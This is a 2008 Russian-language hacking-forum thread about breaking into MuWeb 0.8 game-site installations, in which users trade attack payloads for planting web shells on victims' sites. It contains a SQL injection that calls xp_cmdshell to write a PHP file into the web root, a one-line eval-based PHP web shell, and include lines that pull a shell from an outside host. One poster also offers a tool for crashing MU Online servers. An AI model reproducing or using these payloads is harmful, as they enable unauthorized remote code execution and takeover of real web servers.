[Видео] Взлом MuWeb 0.8

Discussion in 'Video.Antichat' started by Ponchik, 26 May 2008.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause :)

    Code:
    http://www.sharemania.ru/0226098
    Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит :)
    P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить
     
    #1 Ponchik, 26 May 2008
    Last edited: 10 Jun 2008
    12 people like this.
  2. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Молодец пончик. Так держать. Может и в моа возьмут :)
     
    #2 Dimi4, 26 May 2008
    Last edited: 17 Jun 2008
    1 person likes this.
  3. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Ета команда показавает всю инфу о ПХП :
    PHP:
    '; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';--
    А что надо прописать, чтобы отсюда -> http://globnet.oo.lv/shell.php загрузить шелл на сайт жертвы ???
     
  4. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
    В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш
     
    3 people like this.
  5. NooB1k

    NooB1k New Member

    Joined:
    16 Jun 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Круто. 10\10. Можно вопрос я За шол на какойто му в админку сам узнал как заходить не повторял как у тебя.Когда я хочу что там сменит меня снова выкидывает в админку в начало и не меняется,что делать? обращаюсь к тебе т.к ты понимаешь в этом деле.
     
    1 person likes this.
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    ну впринцыпе ничего фантастического, но вопрос, как ты нашел багу, где в админку не пускает тупо только алертом =)))) за это молодец.
     
  7. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Ну вот...как ето понять
    PHP:
    <? stripslashes(eval($_GET[c])); ?>
    Тут понятнее
    PHP:
    '; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:AppServ/www/shell.php;--
    понятно куда заливаешь, и в какой фаил :)

    может быть так :confused: и куда свой сайт вписовать (откуда шелл закачивать надо) ?
     
    #7 Ronny, 17 Jun 2008
    Last edited: 17 Jun 2008
  8. NooB1k

    NooB1k New Member

    Joined:
    16 Jun 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Ronny,тебе сказали уже куда и как,я всё понял с 1 раза.Хоть я это не знал!
     
  9. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Ну может обясниш...мне тупому человеку ???
     
  10. NooB1k

    NooB1k New Member

    Joined:
    16 Jun 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    <? stripslashes(eval($_GET[c])); ?> stripslashes()
     
  11. NooB1k

    NooB1k New Member

    Joined:
    16 Jun 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Рони кстати у меня есть прога он сервер muonline сносит в миг!могу скинуть дай асю
     
  12. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    :d ето я понял...а мне же нужно шелл с сайта загрузить...
    - Скажи куда сылку вписовать, раз ты такой Умный :d
    ICQ - 387777909
     
  13. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    PHP:
    <?php include ("www.site.com/shell.php"); ?>
    А всё таки лучше не много подчитай, чтобы понятнее было.
     
  14. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Code:
    '; USE Master exec xp_cmdshell 'echo "<?php include ("www.site.com/shell.php"); ?>" > C:AppServwwwshell.php;--
    Ето должно получиться ?

    или просто вписовать ?
    Code:
    <?php include ("www.site.com/shell.php"); ?>
     
  15. NooB1k

    NooB1k New Member

    Joined:
    16 Jun 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Ronny похоже
     
  16. Ronny

    Ronny New Member

    Joined:
    6 Jun 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    <? stripslashes(eval($_GET[c])); ?> stripslashes(http://globnet.oo.lv/shell/shell.txt)

    ТАК ????